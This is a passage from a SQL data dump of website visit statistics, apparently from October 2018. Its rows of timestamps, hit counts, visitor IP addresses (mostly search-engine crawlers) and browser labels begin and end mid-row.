66.249.66.156','chrome'),(319630,1540072704,3,3,0,0,'66.249.66.155','chrome'),(319631,1540073002,1,1,0,0,'8.29.198.27','other'),(319632,1540073024,1,1,0,0,'66.249.66.57','chrome'),(319633,1540073168,2,2,0,0,'66.249.66.157','chrome'),(319634,1540073188,1,1,0,0,'141.8.142.191','other'),(319635,1540073211,1,1,0,0,'91.242.162.53','other'),(319636,1540073469,1,1,0,0,'8.29.198.26','other'),(319637,1540073631,1,1,0,0,'178.154.244.11','other'),(319638,1540073983,7,6,1,0,'66.249.66.155',''),(319639,1540074098,2,2,0,0,'66.249.66.156','chrome'),(319640,1540074165,1,1,0,0,'66.249.66.57','chrome'),(319641,1540074380,4,4,0,0,'66.249.66.157','chrome'),(319642,1540074741,1,1,0,0,'46.229.168.152','other'),(319643,1540074891,14,14,0,0,'66.249.66.155','chrome'),(319644,1540074941,1,1,0,0,'91.242.162.53','other'),(319645,1540075233,1,1,0,0,'46.229.168.148','other'),(319646,1540075421,1,1,0,0,'46.229.168.153','other'),(319647,1540075488,2,2,0,0,'66.249.66.156','chrome'),(319648,1540076156,2,2,0,0,'91.242.162.53','other'),(319649,1540076178,1,1,0,0,'157.55.39.81','other'),(319650,1540076444,1,1,0,0,'66.249.66.155','chrome'),(319651,1540076720,1,1,0,0,'8.29.198.27','other'),(319652,1540076990,1,1,0,0,'87.250.224.47','other'),(319653,1540077007,1,1,0,0,'141.8.142.144','other'),(319654,1540077009,3,3,0,0,'178.154.171.17','other'),(319655,1540077014,1,1,0,0,'141.8.142.108','other'),(319656,1540077016,2,2,0,0,'213.180.203.53','other'),(319657,1540077018,1,1,0,0,'95.108.181.94','other'),(319658,1540077019,2,2,0,0,'178.154.244.21','other'),(319659,1540077021,2,2,0,0,'178.154.200.8','other'),(319660,1540077023,2,2,0,0,'37.9.113.38','other'),(319661,1540077025,1,1,0,0,'5.45.207.76','other'),(319662,1540077026,2,2,0,0,'141.8.142.162','other'),(319663,1540077028,2,2,0,0,'178.154.244.11','other'),(319664,1540077029,2,2,0,0,'5.45.207.19','other'),(319665,1540077031,1,1,0,0,'213.180.203.9','other'),(319666,1540077032,1,1,0,0,'37.9.113.103','other'),(319667,1540077034,2,2,0,0,'178.154.171.27','other'),(319668,1540077036,2,2,0,0,'213.180.203.17','other'),(319669,1540077038,2,2,0,0,'141.8.142.38','other'),(319670,1540077040,1,1,0,0,'213.180.203.23','other'),(319671,1540077045,1,1,0,0,'5.255.253.22','other'),(319672,1540077046,1,1,0,0,'95.108.181.75','other'),(319673,1540077050,1,1,0,0,'87.250.224.65','other'),(319674,1540077052,1,1,0,0,'178.154.244.49','other'),(319675,1540077057,1,1,0,0,'95.108.213.50','other'),(319676,1540077059,1,1,0,0,'178.154.200.48','other'),(319677,1540077549,3,3,0,0,'66.249.66.157','chrome'),(319678,1540077601,1,1,0,0,'66.249.66.155','chrome'),(319679,1540077679,1,1,0,0,'66.249.66.156','chrome'),(319680,1540078028,1,1,0,0,'216.244.66.241','other'),(319681,1540078151,1,1,0,0,'18.196.18.95','other'),(319682,1540078159,5,5,0,0,'178.154.244.11','other'),(319683,1540078240,7,7,0,0,'178.154.244.29','other'),(319684,1540078322,1,1,0,0,'5.45.207.79','other'),(319685,1540078469,1,1,0,0,'128.69.232.223','chrome'),(319686,1540080938,1,1,0,0,'66.249.66.155','chrome'),(319687,1540081139,1,1,0,0,'46.229.168.154','other'),(319688,1540081260,2,2,0,0,'178.154.244.29','other'),(319689,1540081559,1,1,0,0,'66.249.66.156','chrome'),(319690,1540082492,1,1,0,0,'66.249.66.155','chrome'),(319691,1540083040,1,1,0,0,'178.154.244.29','other'),(319692,1540083833,1,1,0,0,'8.29.198.25','other'),(319693,1540084101,2,2,0,0,'178.154.244.29','other'),(319694,1540084300,1,1,0,0,'8.29.198.27','other'),(319695,1540085099,1,1,0,0,'46.229.168.137','other'),(319696,1540087011,1,1,0,0,'46.229.168.147','other'),(319697,1540087550,1,1,0,0,'8.29.198.27','other'),(319698,1540089295,1,1,0,0,'95.163.255.98','other'),(319699,1540089735,1,1,0,0,'66.249.66.157','chrome'),(319700,1540090317,1,1,0,0,'178.62.1.134','other'),(319701,1540090569,1,1,0,0,'66.249.66.155','chrome'),(319702,1540090683,1,1,0,0,'178.154.244.11','other'),(319703,1540091448,2,2,0,0,'66.249.66.156','chrome'),(319704,1540092681,2,2,0,0,'5.45.207.79','other'),(319705,1540092689,1,1,0,0,'87.250.224.47','other'),(319706,1540092812,1,1,0,0,'66.249.66.155','chrome'),(319707,1540094581,3,3,0,0,'91.242.162.37','other'),(319708,1540094669,1,1,0,0,'8.29.198.26','other'),(319709,1540094675,1,1,0,0,'66.249.66.59','chrome'),(319710,1540095137,1,1,0,0,'8.29.198.27','other'),(319711,1540095521,2,2,0,0,'91.242.162.37','other'),(319712,1540095692,2,2,0,0,'216.244.66.241','other'),(319713,1540096081,1,1,0,0,'66.249.66.155','chrome'),(319714,1540096554,2,2,0,0,'66.249.66.157','chrome'),(319715,1540097421,2,2,0,0,'91.242.162.37','other'),(319716,1540097449,1,1,0,0,'66.102.9.40','chrome'),(319717,1540097753,1,1,0,0,'66.249.66.155','chrome'),(319718,1540097914,1,1,0,0,'66.249.66.157','chrome'),(319719,1540098235,1,1,0,0,'145.239.88.66','chrome'),(319720,1540098386,1,1,0,0,'8.29.198.26','other'),(319721,1540098574,3,3,0,0,'91.242.162.37','other'),(319722,1540098703,1,1,0,0,'87.250.224.47','other'),(319723,1540098706,1,1,0,0,'178.154.244.11','other'),(319724,1540098709,2,2,0,0,'178.154.244.29','other'),(319725,1540099496,6,6,0,0,'91.242.162.37','other'),(319726,1540099842,1,1,0,0,'66.249.66.156','chrome'),(319727,1540100606,1,1,0,0,'207.46.13.160','other'),(319728,1540100651,1,1,0,0,'46.229.168.151','other'),(319729,1540101043,1,1,0,0,'157.55.39.89','other'),(319730,1540101126,2,2,0,0,'91.242.162.37','other'),(319731,1540102062,5,5,0,0,'91.242.162.37','other'),(319732,1540102684,1,1,0,0,'66.249.66.156','chrome'),(319733,1540102788,1,1,0,0,'46.229.168.140','other'),(319734,1540103396,1,1,0,0,'91.242.162.37','other'),(319735,1540104776,1,1,0,0,'192.198.102.158','chrome'),(319736,1540105323,6,6,0,0,'91.242.162.37','other'),(319737,1540105501,2,2,0,0,'8.29.198.26','other'),(319738,1540105917,1,1,0,0,'216.244.66.241','other'),(319739,1540105972,1,1,0,0,'66.249.66.156','chrome'),(319740,1540106609,1,1,0,0,'91.242.162.37','other'),(319741,1540107307,1,1,0,0,'216.244.66.241','other'),(319742,1540107514,1,1,0,0,'95.163.255.96','other'),(319743,1540107952,2,2,0,0,'66.249.66.157','chrome'),(319744,1540108364,1,1,0,0,'91.196.178.132','chrome'),(319745,1540108444,1,1,0,0,'178.154.244.11','other'),(319746,1540108453,2,2,0,0,'216.244.66.241','other'),(319747,1540108600,1,1,0,0,'95.163.255.96','other'),(319748,1540109100,2,2,0,0,'66.249.66.157','chrome'),(319749,1540109212,1,1,0,0,'8.29.198.26','other'),(319750,1540109562,1,1,0,0,'95.163.255.97','other'),(319751,1540109580,3,3,0,0,'178.154.244.29','other'),(319752,1540109895,1,1,0,0,'178.154.244.11','other'),(319753,1540109958,1,1,0,0,'180.76.15.139','other'),(319754,1540109990,2,2,0,0,'5.45.207.79','other'),(319755,1540110012,1,1,0,0,'46.229.168.149','other'),(319756,1540110357,1,1,0,0,'66.249.66.157','chrome'),(319757,1540110699,4,4,0,0,'178.154.244.29','other'),(319758,1540110895,3,3,0,0,'66.249.66.156','chrome'),(319759,1540111041,1,1,0,0,'87.250.224.65','other'),(319760,1540111219,1,1,0,0,'178.154.244.65','other'),(319761,1540111325,1,1,0,0,'37.54.23.36','chrome'),(319762,1540111915,1,1,0,0,'178.154.244.29','other'),(319763,1540112301,1,1,0,0,'5.45.207.79','other'),(319764,1540112329,4,4,0,0,'178.154.244.11','other'),(319765,1540112858,1,1,0,0,'145.239.88.66','chrome'),(319766,1540113025,1,1,0,0,'66.249.66.57','chrome'),(319767,1540113240,1,1,0,0,'178.154.244.11','other'),(319768,1540113270,1,1,0,0,'5.45.207.79','other'),(319769,1540113723,1,1,0,0,'66.249.66.156','chrome'),(319770,1540113743,1,1,0,0,'178.154.244.29','other'),(319771,1540114306,1,1,0,0,'66.249.66.157','chrome'),(319772,1540114455,1,1,0,0,'178.154.244.11','other'),(319773,1540114582,1,1,0,0,'5.45.207.79','other'),(319774,1540115552,1,1,0,0,'66.249.66.157','chrome'),(319775,1540115560,3,3,0,0,'66.249.66.156','chrome'),(319776,1540116008,1,1,0,0,'46.229.168.142','other'),(319777,1540116334,2,2,0,0,'8.29.198.25','other'),(319778,1540117159,1,1,0,0,'91.196.178.94','chrome'),(319779,1540117235,2,2,0,0,'66.249.66.155','chrome'),(319780,1540118859,1,1,0,0,'178.154.244.29','other'),(319781,1540119231,1,1,0,0,'66.249.66.157','chrome'),(319782,1540119997,1,1,0,0,'66.249.66.156','chrome'),(319783,1540120033,1,1,0,0,'8.29.198.25','other'),(319784,1540120413,1,1,0,0,'66.249.66.61','chrome'),(319785,1540120592,1,1,0,0,'157.55.39.132','other'),(319786,1540121146,1,1,0,0,'66.249.66.155','chrome'),(319787,1540121489,1,1,0,0,'178.154.244.29','other'),(319788,1540121681,1,1,0,0,'66.249.66.61','chrome'),(319789,1540122016,9,9,0,0,'207.46.13.213','other'),(319790,1540122071,1,1,0,0,'66.249.66.156','chrome'),(319791,1540122121,1,1,0,0,'66.249.66.155','chrome'),(319792,1540122547,9,9,0,0,'157.55.39.168','other'),(319793,1540122559,6,6,0,0,'157.55.39.132','other'),(319794,1540122566,8,8,0,0,'207.46.13.160','other'),(319795,1540122978,2,2,0,0,'178.154.244.11','other'),(319796,1540123001,1,1,0,0,'5.45.207.19','other'),(319797,1540123061,1,1,0,0,'87.250.224.47','other'),(319798,1540123066,4,4,0,0,'178.154.244.29','other'),(319799,1540123117,1,1,0,0,'5.45.207.79','other'),(319800,1540125082,1,1,0,0,'66.249.66.61','chrome'),(319801,1540125116,1,1,0,0,'85.91.193.243','chrome'),(319802,1540125287,1,1,0,0,'66.249.66.156','chrome'),(319803,1540125572,1,1,0,0,'207.46.13.213','other'),(319804,1540126650,1,1,0,0,'66.249.66.61','chrome'),(319805,1540126705,1,1,0,0,'130.180.211.20','chrome'),(319806,1540127185,1,1,0,0,'8.29.198.25','other'),(319807,1540127620,1,1,0,0,'8.29.198.26','other'),(319808,1540127916,1,1,0,0,'66.249.66.157','chrome'),(319809,1540128810,1,1,0,0,'216.244.66.241','other'),(319810,1540129044,1,1,0,0,'157.55.39.132','other'),(319811,1540130086,1,1,0,0,'66.249.66.57','chrome'),(319812,1540130585,1,1,0,0,'37.9.113.103','other'),(319813,1540130587,1,1,0,0,'213.180.203.40','other'),(319814,1540130618,1,1,0,0,'37.9.113.20','other'),(319815,1540130866,1,1,0,0,'8.29.198.25','other'),(319816,1540131032,2,2,0,0,'207.46.13.213','other'),(319817,1540131214,3,3,0,0,'66.249.66.157','chrome'),(319818,1540132899,1,1,0,0,'66.249.66.155','chrome'),(319819,1540133494,1,1,0,0,'66.249.66.156','chrome'),(319820,1540133864,2,2,0,0,'178.154.244.29','other'),(319821,1540135818,1,1,0,0,'66.249.66.157','chrome'),(319822,1540137264,1,1,0,0,'46.229.168.132','other'),(319823,1540137358,1,1,0,0,'157.55.39.132','other'),(319824,1540137666,3,3,0,0,'66.249.66.157','chrome'),(319825,1540137910,1,1,0,0,'46.229.168.151','other'),(319826,1540138026,1,1,0,0,'8.29.198.27','other'),(319827,1540138456,1,1,0,0,'8.29.198.25','other'),(319828,1540138475,1,1,0,0,'66.249.66.155','chrome'),(319829,1540138686,1,1,0,0,'66.249.66.157','chrome'),(319830,1540139614,1,1,0,0,'46.229.168.132','other'),(319831,1540139632,1,1,0,0,'66.249.66.155','chrome'),(319832,1540140203,1,1,0,0,'39.104.154.81','other'),(319833,1540140735,1,1,0,0,'91.196.178.185','chrome'),(319834,1540140984,1,1,0,0,'66.249.66.155','chrome'),(319835,1540141069,1,1,0,0,'66.249.66.157','chrome'),(319836,1540141240,1,1,0,0,'66.249.66.57','chrome'),(319837,1540141695,1,1,0,0,'8.29.198.25','other'),(319838,1540142877,1,1,0,0,'66.249.66.156','chrome'),(319839,1540143451,2,2,0,0,'66.249.66.157','chrome'),(319840,1540144061,1,1,0,0,'46.229.168.144','other'),(319841,1540144418,1,1,0,0,'66.249.66.156','chrome'),(319842,1540144583,2,2,0,0,'66.249.66.157','chrome'),(319843,1540144788,2,2,0,0,'178.154.244.11','other'),(319844,1540144890,3,3,0,0,'178.154.244.29','other'),(319845,1540145413,1,1,0,0,'95.163.255.92','other'),(319846,1540145538,2,2,0,0,'66.249.66.155','chrome'),(319847,1540145775,1,1,0,0,'66.249.66.156','chrome'),(319848,1540145928,1,1,0,0,'216.244.66.241','other'),(319849,1540145965,2,2,0,0,'178.154.244.29','other'),(319850,1540146497,1,1,0,0,'5.45.207.79','other'),(319851,1540146527,1,1,0,0,'87.250.224.47','other'),(319852,1540146862,1,1,0,0,'87.250.224.65','other'),(319853,1540146926,4,4,0,0,'178.154.244.29','other'),(319854,1540147470,1,1,0,0,'95.163.255.97','other'),(319855,1540148282,1,1,0,0,'54.145.83.79','other'),(319856,1540148516,1,1,0,0,'18.194.152.205','other'),(319857,1540148620,1,1,0,0,'66.249.66.157','chrome'),(319858,1540148863,2,2,0,0,'8.29.198.25','other'),(319859,1540149016,1,1,0,0,'66.249.66.156','chrome'),(319860,1540149660,2,2,0,0,'216.244.66.241','other'),(319861,1540149939,1,1,0,0,'218.66.74.227','other'),(319862,1540150160,1,1,0,0,'46.229.168.142','other'),(319863,1540150541,2,2,0,0,'66.249.66.155','chrome'),(319864,1540151377,1,1,0,0,'207.46.13.160','other'),(319865,1540152524,1,1,0,0,'8.29.198.25','other'),(319866,1540153010,1,1,0,0,'66.249.66.155','chrome'),(319867,1540153855,1,1,0,0,'66.249.66.156','chrome'),(319868,1540154727,1,1,0,0,'66.249.66.155','chrome'),(319869,1540155312,1,1,0,0,'46.229.168.129','other'),(319870,1540155772,1,1,0,0,'178.154.244.11','other'),(319871,1540155984,1,1,0,0,'91.203.136.58','firefox'),(319872,1540157542,1,1,0,0,'66.249.66.157','chrome'),(319873,1540159709,2,2,0,0,'8.29.198.27','other'),(319874,1540160538,1,1,0,0,'66.249.66.156','chrome'),(319875,1540160613,2,2,0,0,'66.249.66.157','chrome'),(319876,1540160714,1,1,0,0,'66.249.66.61','chrome'),(319877,1540160788,2,2,0,0,'66.249.66.155','chrome'),(319878,1540161009,1,1,0,0,'207.46.13.160','other'),(319879,1540161176,1,1,0,0,'95.163.255.97','other'),(319880,1540161842,1,1,0,0,'180.76.15.136','other'),(319881,1540162639,1,1,0,0,'46.229.168.134','other'),(319882,1540162754,1,1,0,0,'216.244.66.241','other'),(319883,1540163354,1,1,0,0,'8.29.198.25','other'),(319884,1540164575,1,1,0,0,'5.45.207.79','other'),(319885,1540164863,6,6,0,0,'194.67.210.57','firefox'),(319886,1540165129,1,1,0,0,'216.244.66.241','other'),(319887,1540165496,2,2,0,0,'66.249.66.156','chrome'),(319888,1540166083,2,2,0,0,'66.249.66.59','chrome'),(319889,1540166514,1,1,0,0,'91.196.178.131','chrome'),(319890,1540166605,1,1,0,0,'66.249.66.155','chrome'),(319891,1540166681,1,1,0,0,'66.249.66.156','chrome'),(319892,1540167992,1,1,0,0,'180.76.15.163','other'),(319893,1540168798,3,3,0,0,'66.249.66.155','chrome'),(319894,1540169158,1,1,0,0,'66.249.66.156','chrome'),(319895,1540169526,1,1,0,0,'178.154.244.29','other'),(319896,1540169690,1,1,0,0,'157.55.39.168','other'),(319897,1540170069,1,1,0,0,'66.249.66.157','chrome'),(319898,1540170574,1,1,0,0,'8.29.198.26','other'),(319899,1540170611,1,1,0,0,'157.55.39.132','other'),(319900,1540170638,1,1,0,0,'95.163.255.94','other'),(319901,1540170643,1,1,0,0,'207.46.13.213','other'),(319902,1540170976,1,1,0,0,'8.29.198.25','other'),(319903,1540171599,1,1,0,0,'46.229.168.132','other'),(319904,1540171933,2,2,0,0,'207.46.13.213','other'),(319905,1540172008,1,1,0,0,'66.249.66.156','chrome'),(319906,1540172657,3,3,0,0,'66.249.66.157','chrome'),(319907,1540172747,2,2,0,0,'66.249.66.155','chrome'),(319908,1540173383,1,1,0,0,'157.55.39.168','other'),(319909,1540173455,1,1,0,0,'46.229.168.130','other'),(319910,1540173714,2,2,0,0,'66.249.66.155','chrome'),(319911,1540174190,1,1,0,0,'8.29.198.27','other'),(319912,1540174613,1,1,0,0,'95.163.255.97','other'),(319913,1540175001,1,0,1,0,'66.249.66.59',''),(319914,1540175294,1,1,0,0,'46.229.168.149','other'),(319915,1540175409,2,2,0,0,'216.244.66.241','other'),(319916,1540175601,1,1,0,0,'178.154.244.29','other'),(319917,1540176140,1,1,0,0,'66.249.66.61','chrome'),(319918,1540176659,1,1,0,0,'66.249.66.157','chrome'),(319919,1540177230,2,2,0,0,'216.244.66.241','other'),(319920,1540178166,1,1,0,0,'66.249.66.155','chrome'),(319921,1540178287,1,1,0,0,'66.249.66.156','chrome'),(319922,1540178838,3,3,0,0,'66.249.66.157','chrome'),(319923,1540178860,1,1,0,0,'216.244.66.241','other'),(319924,1540179052,1,1,0,0,'66.249.66.61','chrome'),(319925,1540179455,1,1,0,0,'66.249.66.156','chrome'),(319926,1540180666,1,1,0,0,'216.244.66.241','other'),(319927,1540181149,1,1,0,0,'66.249.66.157','chrome'),(319928,1540181157,1,1,0,0,'66.249.66.155','chrome'),(319929,1540181410,2,2,0,0,'8.29.198.26','other'),(319930,1540181803,1,1,0,0,'185.220.101.34','chrome'),(319931,1540184683,1,1,0,0,'66.249.66.155','chrome'),(319932,1540184791,2,2,0,0,'207.46.13.160','other'),(319933,1540184798,3,3,0,0,'157.55.39.168','other'),(319934,1540184805,1,1,0,0,'157.55.39.132','other'),(319935,1540184811,3,3,0,0,'207.46.13.213','other'),(319936,1540185026,1,1,0,0,'8.29.198.25','other'),(319937,1540185041,2,2,0,0,'66.249.66.156','chrome'),(319938,1540185664,1,1,0,0,'66.249.66.157','chrome'),(319939,1540186068,2,2,0,0,'91.209.11.236','other'),(319940,1540187484,1,1,0,0,'66.249.66.155','chrome'),(319941,1540187509,1,1,0,0,'157.55.39.132','other'),(319942,1540187712,1,1,0,0,'207.46.13.160','other'),(319943,1540188097,2,2,0,0,'91.209.11.236','other'),(319944,1540188764,2,2,0,0,'66.249.66.157','chrome'),(319945,1540189355,1,1,0,0,'46.229.168.145','other'),(319946,1540189548,1,1,0,0,'66.249.66.156','chrome'),(319947,1540189549,2,2,0,0,'66.249.66.155','chrome'),(319948,1540190228,1,1,0,0,'66.249.66.157','chrome'),(319949,1540190658,1,1,0,0,'91.196.178.89','chrome'),(319950,1540191180,5,5,0,0,'178.154.244.29','other'),(319951,1540191206,2,2,0,0,'178.154.244.11','other'),(319952,1540191415,1,1,0,0,'5.45.207.79','other'),(319953,1540191729,3,3,0,0,'66.249.66.155','chrome'),(319954,1540191893,1,1,0,0,'66.249.66.157','chrome'),(319955,1540192179,1,1,0,0,'178.154.244.11','other'),(319956,1540192254,1,1,0,0,'8.29.198.27','other'),(319957,1540192562,1,1,0,0,'46.229.168.130','other'),(319958,1540192641,1,1,0,0,'8.29.198.26','other'),(319959,1540192720,2,2,0,0,'178.154.244.29','other'),(319960,1540193513,1,1,0,0,'95.108.181.75','other'),(319961,1540193649,1,1,0,0,'178.154.244.11','other'),(319962,1540193712,1,1,0,0,'66.249.66.156','chrome'),(319963,1540193941,1,1,0,0,'66.249.66.157','chrome'),(319964,1540194070,1,1,0,0,'91.200.54.88','chrome'),(319965,1540194171,1,1,0,0,'66.249.66.155','chrome'),(319966,1540194173,1,1,0,0,'141.8.142.108','other'),(319967,1540194275,4,4,0,0,'178.154.244.29','other'),(319968,1540194681,1,1,0,0,'180.76.15.139','other'),(319969,1540194841,3,3,0,0,'178.154.244.11','other'),(319970,1540195013,1,1,0,0,'95.163.255.95','other'),(319971,1540195228,2,2,0,0,'216.244.66.241','other'),(319972,1540195353,1,1,0,0,'37.9.113.103','other'),(319973,1540195356,1,1,0,0,'78.26.198.173','chrome'),(319974,1540195411,1,1,0,0,'66.249.66.156','chrome'),(319975,1540195520,3,3,0,0,'178.154.244.29','other'),(319976,1540195679,1,1,0,0,'95.132.0.221','firefox'),(319977,1540195774,1,1,0,0,'46.229.168.136','other'),(319978,1540195852,1,1,0,0,'8.29.198.25','other'),(319979,1540196157,1,1,0,0,'46.229.168.146','other'),(319980,1540197026,1,1,0,0,'178.154.244.29','other'),(319981,1540197277,1,1,0,0,'66.249.66.155','chrome'),(319982,1540197366,1,1,0,0,'91.196.178.89','chrome'),(319983,1540197498,1,1,0,0,'141.8.183.23','other'),(319984,1540197578,1,1,0,0,'66.249.66.157','chrome'),(319985,1540197581,1,1,0,0,'178.154.244.11','other'),(319986,1540198111,1,1,0,0,'46.229.168.134','other'),(319987,1540198334,1,1,0,0,'46.229.168.151','other'),(319988,1540198337,1,1,0,0,'216.244.66.241','other'),(319989,1540198458,1,1,0,0,'95.163.255.96','other'),(319990,1540198727,1,1,0,0,'5.45.207.19','other'),(319991,1540199090,1,1,0,0,'66.249.66.157','chrome'),(319992,1540199146,2,2,0,0,'66.249.66.155','chrome'),(319993,1540199185,1,1,0,0,'46.30.166.126','chrome'),(319994,1540199381,1,1,0,0,'91.196.178.89','chrome'),(319995,1540199843,1,1,0,0,'180.76.15.29','other'),(319996,1540200449,1,1,0,0,'216.244.66.241','other'),(319997,1540201141,1,1,0,0,'66.249.66.156','chrome'),(319998,1540201932,1,1,0,0,'91.196.178.89','chrome'),(319999,1540202287,1,1,0,0,'194.44.179.166','chrome'),(320000,1540202462,1,1,0,0,'95.134.203.247','chrome'),(320001,1540203094,2,2,0,0,'8.29.198.27','other'),(320002,1540203355,1,1,0,0,'46.229.168.144','other'),(320003,1540203487,4,4,0,0,'216.244.66.241','other'),(320004,1540203521,1,1,0,0,'46.200.74.174','chrome'),(320005,1540203833,1,1,0,0,'106.38.241.130','other'),(320006,1540204977,2,2,0,0,'95.134.202.15','chrome'),(320007,1540205459,1,1,0,0,'178.154.244.29','other'),(320008,1540205463,1,1,0,0,'178.154.244.11','other'),(320009,1540205945,1,1,0,0,'66.102.9.35','chrome'),(320010,1540206149,1,1,0,0,'5.45.207.19','other'),(320011,1540206263,1,1,0,0,'95.163.255.99','other'),(320012,1540206290,1,1,0,0,'66.249.66.155','chrome'),(320013,1540206325,1,1,0,0,'95.163.255.95','other'),(320014,1540206685,1,1,0,0,'8.29.198.25','other'),(320015,1540207638,1,1,0,0,'39.104.158.249','other'),(320016,1540208785,1,1,0,0,'188.163.16.129','chrome'),(320017,1540209910,1,1,0,0,'46.229.168.129','other'),(320018,1540210108,2,2,0,0,'178.154.244.29','other'),(320019,1540210371,1,1,0,0,'193.19.119.83','firefox'),(320020,1540210826,1,1,0,0,'91.196.178.89','chrome'),(320021,1540211417,1,1,0,0,'216.244.66.241','other'),(320022,1540211561,1,1,0,0,'95.132.0.221','firefox'),(320023,1540211568,1,1,0,0,'46.229.168.130','other'),(320024,1540211813,1,1,0,0,'91.196.178.70','chrome'),(320025,1540212242,2,2,0,0,'178.154.244.29','other'),(320026,1540212724,1,1,0,0,'91.196.178.74','chrome'),(320027,1540213332,1,1,0,0,'66.249.66.155','chrome'),(320028,1540213648,1,1,0,0,'178.95.67.249','chrome'),(320029,1540213960,2,2,0,0,'8.29.198.26','other'),(320030,1540214325,1,1,0,0,'216.244.66.241','other'),(320031,1540214793,1,1,0,0,'91.124.58.117','chrome'),(320032,1540215967,2,2,0,0,'91.196.178.169','chrome'),(320033,1540216196,1,0,1,0,'66.249.66.157',''),(320034,1540216203,2,0,2,0,'66.249.66.155',''),(320035,1540217118,1,1,0,0,'178.95.67.249','chrome'),(320036,1540217122,1,1,0,0,'91.196.178.186','chrome'),(320037,1540217510,1,1,0,0,'8.29.198.27','other'),(320038,1540217981,1,1,0,0,'66.249.66.59','chrome'),(320039,1540220019,1,1,0,0,'188.230.43.254','other'),(320040,1540220432,1,1,0,0,'91.196.178.82','firefox'),(320041,1540221553,2,2,0,0,'216.244.66.241','other'),(320042,1540222078,1,1,0,0,'46.229.168.130','other'),(320043,1540222411,1,1,0,0,'188.230.43.254','other'),(320044,1540223890,1,1,0,0,'37.9.113.103','other'),(320045,1540224800,29,29,0,0,'54.224.247.42','other'),(320046,1540224804,1,1,0,0,'8.29.198.26','other'),(320047,1540224811,1,1,0,0,'188.230.43.254','other'),(320048,1540225145,1,1,0,0,'8.29.198.27','other'),(320049,1540225223,1,1,0,0,'178.154.244.11','other'),(320050,1540225338,1,1,0,0,'46.173.55.27','firefox'),(320051,1540225410,1,1,0,0,'207.46.13.213','other'),(320052,1540225606,1,1,0,0,'178.154.244.29','other'),(320053,1540225709,14,14,0,0,'54.224.247.42','other'),(320054,1540225838,1,1,0,0,'193.106.30.98','firefox'),(320055,1540226666,16,16,0,0,'54.224.247.42','other'),(320056,1540226686,1,1,0,0,'180.76.15.33','other'),(320057,1540226975,2,2,0,0,'216.244.66.241','other'),(320058,1540227605,11,11,0,0,'54.224.247.42','other'),(320059,1540228358,1,1,0,0,'8.29.198.26','other'),(320060,1540228709,17,17,0,0,'54.224.247.42','other'),(320061,1540229689,9,9,0,0,'54.224.247.42','other'),(320062,1540230073,1,1,0,0,'46.229.168.138','other'),(320063,1540230610,4,4,0,0,'54.224.247.42','other'),(320064,1540231106,1,1,0,0,'46.229.168.129','other'),(320065,1540233273,1,1,0,0,'178.154.244.11','other'),(320066,1540233460,1,1,0,0,'46.229.168.133','other'),(320067,1540235100,1,0,1,0,'66.249.66.155',''),(320068,1540235121,1,0,1,0,'66.249.66.156',''),(320069,1540235127,1,0,1,0,'66.249.66.59',''),(320070,1540235653,1,1,0,0,'8.29.198.25','other'),(320071,1540235976,1,1,0,0,'8.29.198.27','other'),(320072,1540236487,1,1,0,0,'207.46.13.160','other'),(320073,1540237720,1,1,0,0,'91.196.178.78','chrome'),(320074,1540239193,1,1,0,0,'8.29.198.27','other'),(320075,1540240402,1,1,0,0,'66.249.66.59','chrome'),(320076,1540240405,1,1,0,0,'46.229.168.137','other'),(320077,1540240872,1,1,0,0,'52.53.201.78','chrome'),(320078,1540244267,1,1,0,0,'157.55.39.153','other'),(320079,1540246495,1,1,0,0,'8.29.198.25','other'),(320080,1540246817,1,1,0,0,'8.29.198.27','other'),(320081,1540247430,1,1,0,0,'66.249.66.156','chrome'),(320082,1540247696,1,1,0,0,'46.229.168.141','other'),(320083,1540248944,1,1,0,0,'157.55.39.153','other'),(320084,1540250035,1,1,0,0,'8.29.198.27','other'),(320085,1540250180,1,1,0,0,'178.154.244.29','other'),(320086,1540251180,1,1,0,0,'66.249.66.61','chrome'),(320087,1540251529,1,1,0,0,'46.229.168.134','other'),(320088,1540254164,1,1,0,0,'95.163.255.94','other'),(320089,1540255200,1,1,0,0,'40.77.167.159','other'),(320090,1540256260,1,1,0,0,'207.46.13.213','other'),(320091,1540256300,1,1,0,0,'178.154.244.11','other'),(320092,1540256305,1,1,0,0,'5.45.207.79','other'),(320093,1540256466,2,2,0,0,'178.154.244.29','other'),(320094,1540257332,2,2,0,0,'8.29.198.27','other'),(320095,1540257823,1,1,0,0,'178.154.244.29','other'),(320096,1540258816,5,5,0,0,'178.154.244.29','other'),(320097,1540259173,1,1,0,0,'37.9.113.20','other'),(320098,1540259487,1,1,0,0,'178.154.244.11','other'),(320099,1540259489,1,1,0,0,'141.8.142.103','other'),(320100,1540259861,1,1,0,0,'178.154.244.29','other'),(320101,1540260014,1,1,0,0,'46.229.168.135','other'),(320102,1540260367,1,1,0,0,'5.45.207.79','other'),(320103,1540260697,1,1,0,0,'95.163.255.117','other'),(320104,1540260865,1,1,0,0,'8.29.198.26','other'),(320105,1540260950,1,1,0,0,'178.154.244.11','other'),(320106,1540261206,5,5,0,0,'178.154.244.29','other'),(320107,1540261794,1,1,0,0,'95.163.255.98','other'),(320108,1540262578,1,1,0,0,'178.154.244.29','other'),(320109,1540263410,1,1,0,0,'54.213.223.229','chrome'),(320110,1540264238,1,1,0,0,'180.76.15.29','other'),(320111,1540265556,1,1,0,0,'157.55.39.153','other'),(320112,1540265983,1,1,0,0,'207.46.13.213','other'),(320113,1540266784,1,1,0,0,'46.229.168.133','other'),(320114,1540267487,1,1,0,0,'5.45.207.79','other'),(320115,1540267557,2,2,0,0,'178.154.244.29','other'),(320116,1540268180,1,1,0,0,'8.29.198.25','other'),(320117,1540268495,1,1,0,0,'8.29.198.26','other'),(320118,1540268563,1,0,1,0,'66.249.66.59',''),(320119,1540268597,1,1,0,0,'216.244.66.241','other'),(320120,1540269205,1,1,0,0,'66.249.66.157','chrome'),(320121,1540269244,1,1,0,0,'107.175.153.245','chrome'),(320122,1540269507,1,1,0,0,'207.46.13.213','other'),(320123,1540269656,1,1,0,0,'40.77.167.159','other'),(320124,1540270286,2,2,0,0,'178.154.244.29','other'),(320125,1540271001,1,1,0,0,'216.244.66.241','other'),(320126,1540271174,1,1,0,0,'207.46.13.160','other'),(320127,1540271219,1,1,0,0,'207.46.13.213','other'),(320128,1540271702,1,1,0,0,'8.29.198.26','other'),(320129,1540272029,1,1,0,0,'46.229.168.130','other'),(320130,1540272097,1,1,0,0,'91.196.178.89','chrome'),(320131,1540272575,1,1,0,0,'66.249.66.61','chrome'),(320132,1540272717,2,2,0,0,'178.154.244.11','other'),(320133,1540272723,2,2,0,0,'178.154.244.29','other'),(320134,1540272978,1,1,0,0,'37.53.228.75','chrome'),(320135,154027